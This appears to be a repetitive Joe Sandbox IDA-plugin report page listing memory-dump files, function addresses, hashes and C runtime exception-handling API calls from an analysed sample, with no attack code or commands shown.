Associated: 00000004.00000002.1922042390.000000006CEA4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922128930.000000006CEBE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922155987.000000006CEC0000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922177057.000000006CEC1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922200396.000000006CEC3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECC000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922277834.000000006CECE000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ce20000_4854.jbxd

Similarity

API ID: Copy_strExceptionException@8RaiseThrow_mallocstd::exception::_std::exception::exception
String ID: 0Bl
API String ID: 2299493649-3271211234
Opcode ID: 6c74076f4a09ae5cbd7be380b04333bee380180889ef1295fdeaa63b2e10bff1
Instruction ID: 2a4d120e1d028ce078918672c27d258444c64934a3620c8793a3af8eaa502e40
Opcode Fuzzy Hash: 6c74076f4a09ae5cbd7be380b04333bee380180889ef1295fdeaa63b2e10bff1
Instruction Fuzzy Hash: E5014FB19017049FC714CF59D54188ABBF4AF48304B24C2AED84997B60EB30EA04CBE1

Uniqueness

Uniqueness Score: -1.00%

Function 6CE4DDF0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 38COMMON

Download Yara Rule

APIs

Part of subcall function 6CE89BB5: _malloc.LIBCMT ref: 6CE89BCF

std::exception::exception.LIBCMT ref: 6CE4DE18

Part of subcall function 6CE89533: std::exception::_Copy_str.LIBCMT ref: 6CE8954E

__CxxThrowException@8.LIBCMT ref: 6CE4DE2D

Part of subcall function 6CE8AC75: RaiseException.KERNEL32(?,?,6CE89C34,CB65479A,?,?,?,?,6CE89C34,CB65479A,6CEB9C90,6CECB974,CB65479A), ref: 6CE8ACB7

Strings

0Bl, xrefs: 6CE4DE26

Memory Dump Source

Source File: 00000004.00000002.1921729783.000000006CE21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE20000, based on PE: true

Associated: 00000004.00000002.1921711442.000000006CE20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922042390.000000006CEA4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922128930.000000006CEBE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922155987.000000006CEC0000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922177057.000000006CEC1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922200396.000000006CEC3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECC000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922277834.000000006CECE000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ce20000_4854.jbxd

Similarity

API ID: Copy_strExceptionException@8RaiseThrow_mallocstd::exception::_std::exception::exception
String ID: 0Bl
API String ID: 2299493649-3271211234
Opcode ID: b55b4969298af44597b9e6782be14b783775b96a06ff71dc970ba0d89b8c94b9
Instruction ID: 820be63762700be8996d47a60f52ab85e56f457947651a4ccf2b22f428fd146e
Opcode Fuzzy Hash: b55b4969298af44597b9e6782be14b783775b96a06ff71dc970ba0d89b8c94b9
Instruction Fuzzy Hash: B70128B59007089FC314CF59E541C96BBF8EF58304B24C2AED8599BB61EB30EA04CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 6CE45D30 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 38COMMON

Download Yara Rule

APIs

Part of subcall function 6CE89BB5: _malloc.LIBCMT ref: 6CE89BCF

std::exception::exception.LIBCMT ref: 6CE45D58

Part of subcall function 6CE89533: std::exception::_Copy_str.LIBCMT ref: 6CE8954E

__CxxThrowException@8.LIBCMT ref: 6CE45D6D

Part of subcall function 6CE8AC75: RaiseException.KERNEL32(?,?,6CE89C34,CB65479A,?,?,?,?,6CE89C34,CB65479A,6CEB9C90,6CECB974,CB65479A), ref: 6CE8ACB7

Strings

0Bl, xrefs: 6CE45D66

Memory Dump Source

Source File: 00000004.00000002.1921729783.000000006CE21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE20000, based on PE: true

Associated: 00000004.00000002.1921711442.000000006CE20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922042390.000000006CEA4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922128930.000000006CEBE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922155987.000000006CEC0000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922177057.000000006CEC1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922200396.000000006CEC3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECC000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922277834.000000006CECE000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ce20000_4854.jbxd

Similarity

API ID: Copy_strExceptionException@8RaiseThrow_mallocstd::exception::_std::exception::exception
String ID: 0Bl
API String ID: 2299493649-3271211234
Opcode ID: 3965b228e104caf65701d6280bbf20c7ee4fe5f40fe4d4a722d068722633776a
Instruction ID: 1afd247bde6939dea6e87799b986274977b0c5c24a3767e9b1e3ed584dec7cd7
Opcode Fuzzy Hash: 3965b228e104caf65701d6280bbf20c7ee4fe5f40fe4d4a722d068722633776a
Instruction Fuzzy Hash: 4E014BB19017049FC714CF59E54198BBBF8AF48304B20C2AED8099BB60EB30EA04CBE1

Uniqueness

Uniqueness Score: -1.00%

Function 6CE4DFA0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 38COMMON

Download Yara Rule

APIs

Part of subcall function 6CE89BB5: _malloc.LIBCMT ref: 6CE89BCF

std::exception::exception.LIBCMT ref: 6CE4DFC8

Part of subcall function 6CE89533: std::exception::_Copy_str.LIBCMT ref: 6CE8954E

__CxxThrowException@8.LIBCMT ref: 6CE4DFDD

Part of subcall function 6CE8AC75: RaiseException.KERNEL32(?,?,6CE89C34,CB65479A,?,?,?,?,6CE89C34,CB65479A,6CEB9C90,6CECB974,CB65479A), ref: 6CE8ACB7

Strings

0Bl, xrefs: 6CE4DFD6

Memory Dump Source

Source File: 00000004.00000002.1921729783.000000006CE21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE20000, based on PE: true

Associated: 00000004.00000002.1921711442.000000006CE20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922042390.000000006CEA4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922128930.000000006CEBE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922155987.000000006CEC0000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922177057.000000006CEC1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922200396.000000006CEC3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECC000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922277834.000000006CECE000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ce20000_4854.jbxd

Similarity

API ID: Copy_strExceptionException@8RaiseThrow_mallocstd::exception::_std::exception::exception
String ID: 0Bl
API String ID: 2299493649-3271211234
Opcode ID: db722ead4b0ce0cbc3c1b64fb62df1eb4c228a955397108c957829a45c56ac21
Instruction ID: 16ed25e09dc65b52d325f64f9f769f644883d3baeed41dadeefd2b8da93b6c9d
Opcode Fuzzy Hash: db722ead4b0ce0cbc3c1b64fb62df1eb4c228a955397108c957829a45c56ac21
Instruction Fuzzy Hash: CB014FB59007049FC314CF59D541C9ABBF8AF48314B21C2AED85997B60EB30EA04CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 6CE39B90 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 38COMMON

Download Yara Rule

APIs

Part of subcall function 6CE89BB5: _malloc.LIBCMT ref: 6CE89BCF

std::exception::exception.LIBCMT ref: 6CE39BB8

Part of subcall function 6CE89533: std::exception::_Copy_str.LIBCMT ref: 6CE8954E

__CxxThrowException@8.LIBCMT ref: 6CE39BCD

Part of subcall function 6CE8AC75: RaiseException.KERNEL32(?,?,6CE89C34,CB65479A,?,?,?,?,6CE89C34,CB65479A,6CEB9C90,6CECB974,CB65479A), ref: 6CE8ACB7

Strings

0Bl, xrefs: 6CE39BC6

Memory Dump Source

Source File: 00000004.00000002.1921729783.000000006CE21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE20000, based on PE: true

Associated: 00000004.00000002.1921711442.000000006CE20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922042390.000000006CEA4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922128930.000000006CEBE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922155987.000000006CEC0000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922177057.000000006CEC1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922200396.000000006CEC3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECC000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922277834.000000006CECE000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ce20000_4854.jbxd

Similarity

API ID: Copy_strExceptionException@8RaiseThrow_mallocstd::exception::_std::exception::exception
String ID: 0Bl
API String ID: 2299493649-3271211234
Opcode ID: 24b8ec17043b7603f1ab814009aee09fb50518608659dac54a66a12df20b7edd
Instruction ID: 1d3cd04e10256ccfa306e093e842333efdb3af06504cf36b605fee74e72e58dc
Opcode Fuzzy Hash: 24b8ec17043b7603f1ab814009aee09fb50518608659dac54a66a12df20b7edd
Instruction Fuzzy Hash: 55014BB19107089FC314CF59D541C8ABBF8EF48314B24C6AED8499BB60EB30FA04CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 6CE8BFB4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 6CE8ABC3: __getptd.LIBCMT ref: 6CE8ABC9
Part of subcall function 6CE8ABC3: __getptd.LIBCMT ref: 6CE8ABD9

__getptd.LIBCMT ref: 6CE8BFC3

Part of subcall function 6CE8EAE6: __getptd_noexit.LIBCMT ref: 6CE8EAE9
Part of subcall function 6CE8EAE6: __amsg_exit.LIBCMT ref: 6CE8EAF6

__getptd.LIBCMT ref: 6CE8BFD1

Strings

csm, xrefs: 6CE8BFDF

Memory Dump Source

Source File: 00000004.00000002.1921729783.000000006CE21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE20000, based on PE: true

Associated: 00000004.00000002.1921711442.000000006CE20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922042390.000000006CEA4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922128930.000000006CEBE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922155987.000000006CEC0000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922177057.000000006CEC1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922200396.000000006CEC3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECC000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922277834.000000006CECE000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ce20000_4854.jbxd

Similarity

API ID: __getptd$__amsg_exit__getptd_noexit
String ID: csm
API String ID: 803148776-1018135373
Opcode ID: 86966626eb4e0d809bdbd7093bece3461dc5396f3a0cf366651c66bb381db945
Instruction ID: f166daa322823c459cb7b7ea241c16166686a25451b8459d10e92fc0ab2094d3
Opcode Fuzzy Hash: 86966626eb4e0d809bdbd7093bece3461dc5396f3a0cf366651c66bb381db945
Instruction Fuzzy Hash: 2E01AD349033058FDB21AFA1C440A9DB3B5BF0A31CF340A2EE0595AB90CB309984CB41

Uniqueness

Uniqueness Score: -1.00%

Function 6CE36970 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36COMMON

Download Yara Rule

APIs

Part of subcall function 6CE89BB5: _malloc.LIBCMT ref: 6CE89BCF

std::exception::exception.LIBCMT ref: 6CE36998

Part of subcall function 6CE89533: std::exception::_Copy_str.LIBCMT ref: 6CE8954E

__CxxThrowException@8.LIBCMT ref: 6CE369AD

Part of subcall function 6CE8AC75: RaiseException.KERNEL32(?,?,6CE89C34,CB65479A,?,?,?,?,6CE89C34,CB65479A,6CEB9C90,6CECB974,CB65479A), ref: 6CE8ACB7

Strings

0Bl, xrefs: 6CE369A6

Memory Dump Source

Source File: 00000004.00000002.1921729783.000000006CE21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE20000, based on PE: true

Associated: 00000004.00000002.1921711442.000000006CE20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922042390.000000006CEA4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922128930.000000006CEBE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922155987.000000006CEC0000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922177057.000000006CEC1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922200396.000000006CEC3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECC000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922277834.000000006CECE000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ce20000_4854.jbxd

Similarity

API ID: Copy_strExceptionException@8RaiseThrow_mallocstd::exception::_std::exception::exception
String ID: 0Bl
API String ID: 2299493649-3271211234
Opcode ID: 98b42f30a66058d9328898fffe7d91f28bc4b98dcf8a07c9901bd148da3648d3
Instruction ID: ae625cf7e337f92fa78b2b5d327e719fa3a1f89bdb3b896da20f67ce355cd270
Opcode Fuzzy Hash: 98b42f30a66058d9328898fffe7d91f28bc4b98dcf8a07c9901bd148da3648d3
Instruction Fuzzy Hash: 1C016DB19007049FC714CF59D441896B7F8EF04304B20C2AED8099BB60EB30FA04CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 6CE34A30 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36COMMON

Download Yara Rule

APIs

Part of subcall function 6CE89BB5: _malloc.LIBCMT ref: 6CE89BCF

std::exception::exception.LIBCMT ref: 6CE34A58

Part of subcall function 6CE89533: std::exception::_Copy_str.LIBCMT ref: 6CE8954E

__CxxThrowException@8.LIBCMT ref: 6CE34A6D

Part of subcall function 6CE8AC75: RaiseException.KERNEL32(?,?,6CE89C34,CB65479A,?,?,?,?,6CE89C34,CB65479A,6CEB9C90,6CECB974,CB65479A), ref: 6CE8ACB7

Strings

0Bl, xrefs: 6CE34A66

Memory Dump Source

Source File: 00000004.00000002.1921729783.000000006CE21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE20000, based on PE: true

Associated: 00000004.00000002.1921711442.000000006CE20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922042390.000000006CEA4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922128930.000000006CEBE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922155987.000000006CEC0000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922177057.000000006CEC1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922200396.000000006CEC3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECC000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922277834.000000006CECE000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ce20000_4854.jbxd

Similarity

API ID: Copy_strExceptionException@8RaiseThrow_mallocstd::exception::_std::exception::exception
String ID: 0Bl
API String ID: 2299493649-3271211234
Opcode ID: 587bef5dfe73368cf11451a21a5286b459da5bc0033e619bcfcb7e5242668177
Instruction ID: c03aed3326f2239b969f96542d026c88d6fd7cd2718fde440773616e17851fc9
Opcode Fuzzy Hash: 587bef5dfe73368cf11451a21a5286b459da5bc0033e619bcfcb7e5242668177
Instruction Fuzzy Hash: 54016DB29107049FC314CF99D441896BBF8AF04304B20C2AED8099BB60FB30FA04CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 6CE34B70 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36COMMON

Download Yara Rule

APIs

Part of subcall function 6CE89BB5: _malloc.LIBCMT ref: 6CE89BCF

std::exception::exception.LIBCMT ref: 6CE34B98

Part of subcall function 6CE89533: std::exception::_Copy_str.LIBCMT ref: 6CE8954E

__CxxThrowException@8.LIBCMT ref: 6CE34BAD

Part of subcall function 6CE8AC75: RaiseException.KERNEL32(?,?,6CE89C34,CB65479A,?,?,?,?,6CE89C34,CB65479A,6CEB9C90,6CECB974,CB65479A), ref: 6CE8ACB7

Strings

0Bl, xrefs: 6CE34BA6

Memory Dump Source

Source File: 00000004.00000002.1921729783.000000006CE21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE20000, based on PE: true

Associated: 00000004.00000002.1921711442.000000006CE20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922042390.000000006CEA4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922128930.000000006CEBE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922155987.000000006CEC0000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922177057.000000006CEC1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922200396.000000006CEC3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECC000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922277834.000000006CECE000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ce20000_4854.jbxd

Similarity

API ID: Copy_strExceptionException@8RaiseThrow_mallocstd::exception::_std::exception::exception
String ID: 0Bl
API String ID: 2299493649-3271211234
Opcode ID: fcf72e7f8d217ee943ed35152a0bf1132f0da3fbb76047dff7e47bec80429afe
Instruction ID: a03942047ac1b8b06027d1d151253d8971a366f2aa6beade9f4db8dacc145dba
Opcode Fuzzy Hash: fcf72e7f8d217ee943ed35152a0bf1132f0da3fbb76047dff7e47bec80429afe
Instruction Fuzzy Hash: E1016DB19007089FC708CF99D441986BBF8EF04304B20C2AED8499BB60EB30F904CBE0

Uniqueness

Uniqueness Score: -1.00%

Function 6CE54270 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36COMMON

Download Yara Rule

APIs

Part of subcall function 6CE89BB5: _malloc.LIBCMT ref: 6CE89BCF

std::exception::exception.LIBCMT ref: 6CE54298

Part of subcall function 6CE89533: std::exception::_Copy_str.LIBCMT ref: 6CE8954E

__CxxThrowException@8.LIBCMT ref: 6CE542AD

Part of subcall function 6CE8AC75: RaiseException.KERNEL32(?,?,6CE89C34,CB65479A,?,?,?,?,6CE89C34,CB65479A,6CEB9C90,6CECB974,CB65479A), ref: 6CE8ACB7

Strings

0Bl, xrefs: 6CE542A6

Memory Dump Source

Source File: 00000004.00000002.1921729783.000000006CE21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE20000, based on PE: true

Associated: 00000004.00000002.1921711442.000000006CE20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922042390.000000006CEA4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922128930.000000006CEBE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922155987.000000006CEC0000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922177057.000000006CEC1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922200396.000000006CEC3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECC000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922277834.000000006CECE000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ce20000_4854.jbxd

Similarity

API ID: Copy_strExceptionException@8RaiseThrow_mallocstd::exception::_std::exception::exception
String ID: 0Bl
API String ID: 2299493649-3271211234
Opcode ID: bab40bdb4e8cba034f260ce9e073239c86c6cdcdcdaf75a56bd9e8158cfb8ba4
Instruction ID: f3b7eda52d5dff2f32b4803ce40a5af3868a26b11426b473de19f9d5b94782e9
Opcode Fuzzy Hash: bab40bdb4e8cba034f260ce9e073239c86c6cdcdcdaf75a56bd9e8158cfb8ba4
Instruction Fuzzy Hash: 720181759007049FC304CF99D4418C6B7F8AF04354B20C2AED9099BB60EB30E914CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 6CE34C10 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 34COMMON

Download Yara Rule

APIs

Part of subcall function 6CE89BB5: _malloc.LIBCMT ref: 6CE89BCF

std::exception::exception.LIBCMT ref: 6CE34C38

Part of subcall function 6CE89533: std::exception::_Copy_str.LIBCMT ref: 6CE8954E

__CxxThrowException@8.LIBCMT ref: 6CE34C4D

Part of subcall function 6CE8AC75: RaiseException.KERNEL32(?,?,6CE89C34,CB65479A,?,?,?,?,6CE89C34,CB65479A,6CEB9C90,6CECB974,CB65479A), ref: 6CE8ACB7

Strings

0Bl, xrefs: 6CE34C46

Memory Dump Source

Source File: 00000004.00000002.1921729783.000000006CE21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE20000, based on PE: true

Associated: 00000004.00000002.1921711442.000000006CE20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922042390.000000006CEA4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922128930.000000006CEBE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922155987.000000006CEC0000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922177057.000000006CEC1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922200396.000000006CEC3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECC000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922277834.000000006CECE000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ce20000_4854.jbxd

Similarity

API ID: Copy_strExceptionException@8RaiseThrow_mallocstd::exception::_std::exception::exception
String ID: 0Bl
API String ID: 2299493649-3271211234
Opcode ID: 367be853ff0ab37451798e585296a985b43a2eb1d3a70ea336d4ab5558db39b6
Instruction ID: 9e6cbbede561dc8b02cf049f68ff33b896bae10728d657ac25343e37d11d5f8c
Opcode Fuzzy Hash: 367be853ff0ab37451798e585296a985b43a2eb1d3a70ea336d4ab5558db39b6
Instruction Fuzzy Hash: 56F0C2728002089FD704CF89D4418CABBF8AF04304B20C2AED91D97B60EB30F904CF90

Uniqueness

Uniqueness Score: -1.00%

Function 6CE34850 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 34COMMON

Download Yara Rule

APIs

Part of subcall function 6CE89BB5: _malloc.LIBCMT ref: 6CE89BCF

std::exception::exception.LIBCMT ref: 6CE34878

Part of subcall function 6CE89533: std::exception::_Copy_str.LIBCMT ref: 6CE8954E

__CxxThrowException@8.LIBCMT ref: 6CE3488D

Part of subcall function 6CE8AC75: RaiseException.KERNEL32(?,?,6CE89C34,CB65479A,?,?,?,?,6CE89C34,CB65479A,6CEB9C90,6CECB974,CB65479A), ref: 6CE8ACB7

Strings

0Bl, xrefs: 6CE34886

Memory Dump Source

Source File: 00000004.00000002.1921729783.000000006CE21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE20000, based on PE: true

Associated: 00000004.00000002.1921711442.000000006CE20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922042390.000000006CEA4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922128930.000000006CEBE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922155987.000000006CEC0000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922177057.000000006CEC1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922200396.000000006CEC3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECC000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922277834.000000006CECE000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ce20000_4854.jbxd

Similarity

API ID: Copy_strExceptionException@8RaiseThrow_mallocstd::exception::_std::exception::exception
String ID: 0Bl
API String ID: 2299493649-3271211234
Opcode ID: 679a93f7f23ede1ca031b68d96cf9b47ee755ef1ea640f813d748c6ed84455e1
Instruction ID: c152e738cc929b56c69dacc9bb574c87a63a7a18d2005187c75bbc7043024a64
Opcode Fuzzy Hash: 679a93f7f23ede1ca031b68d96cf9b47ee755ef1ea640f813d748c6ed84455e1
Instruction Fuzzy Hash: 3EF062729106089FC704DF59D8419DABBF8AF05314B24C5AEEC0D97B60EB30FA04CB91

Uniqueness

Uniqueness Score: -1.00%

Function 6CE34AD0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 34COMMON

Download Yara Rule

APIs

Part of subcall function 6CE89BB5: _malloc.LIBCMT ref: 6CE89BCF

std::exception::exception.LIBCMT ref: 6CE34AF8

Part of subcall function 6CE89533: std::exception::_Copy_str.LIBCMT ref: 6CE8954E

__CxxThrowException@8.LIBCMT ref: 6CE34B0D

Part of subcall function 6CE8AC75: RaiseException.KERNEL32(?,?,6CE89C34,CB65479A,?,?,?,?,6CE89C34,CB65479A,6CEB9C90,6CECB974,CB65479A), ref: 6CE8ACB7

Strings

0Bl, xrefs: 6CE34B06

Memory Dump Source

Source File: 00000004.00000002.1921729783.000000006CE21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE20000, based on PE: true

Associated: 00000004.00000002.1921711442.000000006CE20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922042390.000000006CEA4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922128930.000000006CEBE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922155987.000000006CEC0000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922177057.000000006CEC1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922200396.000000006CEC3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECC000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922277834.000000006CECE000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

